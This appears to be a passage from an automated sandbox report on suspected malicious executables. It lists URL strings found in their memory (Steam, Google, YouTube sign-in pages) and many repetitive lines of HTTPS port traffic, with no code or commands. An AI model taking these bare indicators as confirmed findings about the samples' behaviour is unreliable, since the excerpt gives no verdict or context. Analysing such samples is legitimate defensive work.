                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                                Source: chromecache_161.19.drString found in binary or memory: https://support.google.com/accounts?hl=
                                Source: chromecache_161.19.drString found in binary or memory: https://support.google.com/accounts?p=new-si-ui
                                Source: chromecache_161.19.drString found in binary or memory: https://support.google.com/websearch/answer/4358949?hl=ko&ref_topic=3285072
                                Source: chromecache_167.19.drString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
                                Source: 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, chromecache_161.19.drString found in binary or memory: https://www.google.com
                                Source: chromecache_161.19.drString found in binary or memory: https://www.google.com/intl/
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                Source: chromecache_167.19.drString found in binary or memory: https://www.gstatic.com/accounts/speedbump/authzen_optin_illustration.gif
                                Source: chromecache_167.19.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/chrome_48dp.png
                                Source: chromecache_167.19.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png
                                Source: chromecache_167.19.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/gsa_48dp.png
                                Source: chromecache_167.19.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/play_prism_48dp.png
                                Source: chromecache_167.19.drString found in binary or memory: https://www.gstatic.com/images/branding/product/2x/youtube_48dp.png
                                Source: chromecache_161.19.drString found in binary or memory: https://www.gstatic.com/images/branding/productlogos/googleg/v6/36px.svg
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                                Source: chromecache_161.19.drString found in binary or memory: https://www.youtube.com/t/terms?chromeless=1&hl=
                                Source: 84d280a9e8.exe, 00000019.00000002.2953823488.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, 84d280a9e8.exe, 00000019.00000002.2953823488.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, 84d280a9e8.exe, 0000004E.00000002.2953026392.00000000010DA000.00000004.00000020.00020000.00000000.sdmp, 84d280a9e8.exe, 0000004E.00000003.2881673194.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, 84d280a9e8.exe, 0000004E.00000002.2953026392.00000000010A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                Source: chromecache_161.19.drString found in binary or memory: https://youtube.com/t/terms?gl=
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61029 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61064 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61041 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61109 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61076 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61133 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61087 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61052 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61144 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61190 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61065 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61088 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61122 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61099 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61040 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61156 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61108 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61167 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61054 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61134 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61157 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61119 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61097 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61074 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61063 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61042 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61123 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61169 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61098 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61107 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61168 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61030 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61086 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61118 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61135 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61075 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61021 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61044 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61105
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61067 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61106
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61107
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61108
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61109
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61100
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61101
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61124 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61103
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61147 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61104
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61055 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61158 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61116
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61117
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61118
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61119
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61110
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61106 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61111
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61112
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61115
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61079 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61159 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61136 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61117 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61127
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61128
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61129
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61091 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61121
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61122
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61123
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61124
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61125
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61126
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61140
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61170 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61068 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61138
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61043 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61139
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61130
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61011
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61012
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61133
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61013
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61134
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61014
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61125 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61135
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61015
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61136
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61137
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61105 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61011 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61160 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61116 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61172 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61137 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61045 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61066 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61148 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61171 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61126 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61149 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61078 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61022 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61104 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61115 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61190
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61071
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61058 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61072
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61073
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61074
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61173 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61150 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61138 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 61093 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61064
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61065
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61066
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61067
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61068
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61189
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61080
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61081
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61082
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61084
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61085
